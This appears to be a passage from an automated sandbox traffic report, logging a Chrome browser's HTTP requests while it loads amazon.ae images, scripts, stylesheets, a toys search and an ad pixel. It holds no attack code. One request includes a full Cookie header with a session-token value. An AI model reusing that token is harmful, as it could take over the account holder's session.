    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2022/img/Events/XCM_Manual_1463368_4956629_400x400_2X._CB609908562_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41aNmwLQvxL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51nuyTB+MuL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71QNE71u1BL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61yFpBkswxL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986225_UAE_Budget_Store_AE_xsite_home_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_TCEE_Stationairy_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH082_AE_BTS24_GW_bubbler_GL_Dealsonbooks_400x400_EN._CB565231256_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986215_UAE_Budget_Store_AE_xsite_bubbler_generic_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_CL_Grocery_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_TCEE_PCaccessories_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71NMAGNrkiL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986229_UAE_Budget_Store_AE_xsite_toys_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61cw3ImGcLL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/619pZrUnkWL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71VOSLOz4+L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/personalization/ybh/loading-4x-gray._CB485916920_.gif HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986213_UAE_Budget_Store_AE_xsite_bubbler_beauty_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/?_encoding=UTF8&k=toys&crid=33DY8CRTKE0JW&sprefix=toy%2Caps%2C204&ref=nb_sb_noss_1&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unk HTTP/1.1Host: www.amazon.aeConnection: keep-alivedevice-memory: 8sec-ch-device-memory: 8dpr: 1sec-ch-dpr: 1viewport-width: 1280sec-ch-viewport-width: 1280rtt: 150downlink: 10ect: 4gsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264922221&adb:adblk_no; session-token=iEWMYEFKrtJIow/CNVuOz9FUzjcviv4X0ndqos/Z/EndZGMUPIqV/cGu0xyhHpymMzemV8FzzfcoPADcJtxlyqX92z9iptXKr7Ms1mulHo/qBujYJmsju/RRcnb/s2XPz1nDckf2AVkM7phlRS6PK0A8Oyz8zrBSfywK4K42pHS6LfHMBPPWnR7dE/8YgkCddjRb8f8+hproby/VGgI8K8LnWJVX3JXL79eqf88m0ziYgOsvjw8MkYnWie0RnY4FwNp1tJATQeWJi10aPKwLq+9IR2ER+0budc5NnOCUOKiuDhl6E9x/w1jDuk96dSs86r5dxrWNLvn3N15ReTLbBABXtREiOpP9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Appliances_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61xJcNKKLXL.js?AUIClients/AmazonUIjQuery HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2022/img/Events/XCM_Manual_1463368_4956629_400x400_2X._CB609908562_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986221_UAE_Budget_Store_AE_xsite_electronics_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986225_UAE_Budget_Store_AE_xsite_home_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31N-r+VYSWL.js HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11B2bsTfmvL._RC%7C11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01meRT+S4PL.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01Q4S7ptbiL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xlsLy-PNL.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&88n9Ttiw HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986217_UAE_Budget_Store_AE_xsite_bubbler_HPC_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51mS5FhRwRL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51Gz7IimgoL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61Q2hRo4BCL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61lJW9LVKqL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/611TWGHXWyL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/01mI9NDJJTL._RC%7C01Hw8JIiKbL.css,11AQMRD3rsL.css,61VfgvRLcBL.css,01aTTaL5f8L.css,01NbgfyOxdL.css,01OfDy83BLL.css,11rNNhF9giL.css,41t-n4KOXvL.css,01AuLu1p0SL.css,01+A2nZ3DKL.css,11IaasccbKL.css,01m4HdUj51L.css,01LxUNzvnUL.css,11ABzUvcTsL.css,019SP6oir8L.css,31J36LqHTUL.css,01e7DqahglL.css,01h5jb0krML.css,21O-2o3zNXL.css_.css?AUIClients/SearchAssets HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:959.984375,%22v%22:%7B%22p%22:100,%22t%22:1,%22def%22:%22groupm%22%7D,%22ptv%22:1724264922.217,%22ttv%22:1724264922.217%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/21RZgaOpsqL._RC%7C01jGK8CGXTL.css,01LNhrqAZmL.css,11mqgJVSK9L.css,01+6LDwsu8L.css,01ixfc-7StL.css,11ahlU8GWXL.css,01+neHskhqL.css,01U2pA95KSL.css,01fn6WRzO6L.css,01Sqn3dOuBL.css,01KrVAe0PrL.css,31wUat9O8SL.css,31gMGQBDl3L.css,01mP5ZKi0aL.css,01mEWw4285L.css,31FHXBkYr7L.css,11VKiAMd89L.css,21K0oo63ZeL.css,11E6-iRIJOL.css,01K0fSFz6eL.css,014eilLW+IL.css,01MU0Cb7yFL.css,01jaS0ue2bL.css,01Gjv7o0taL.css,019L5P4oPhL.css_.css?AUIClients/SearchPartnerAssets HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31fNEss5igL.css?AUIClients/DetailPageAllOffersDisplayAssets HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_LargeAppliances_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986229_UAE_Budget_Store_AE_xsite_toys_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61BpJ-+2UGL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51BqsgbDI7L.js?AUIClients/CardJsRuntimeBuzzCopyBuild HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Appliances_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
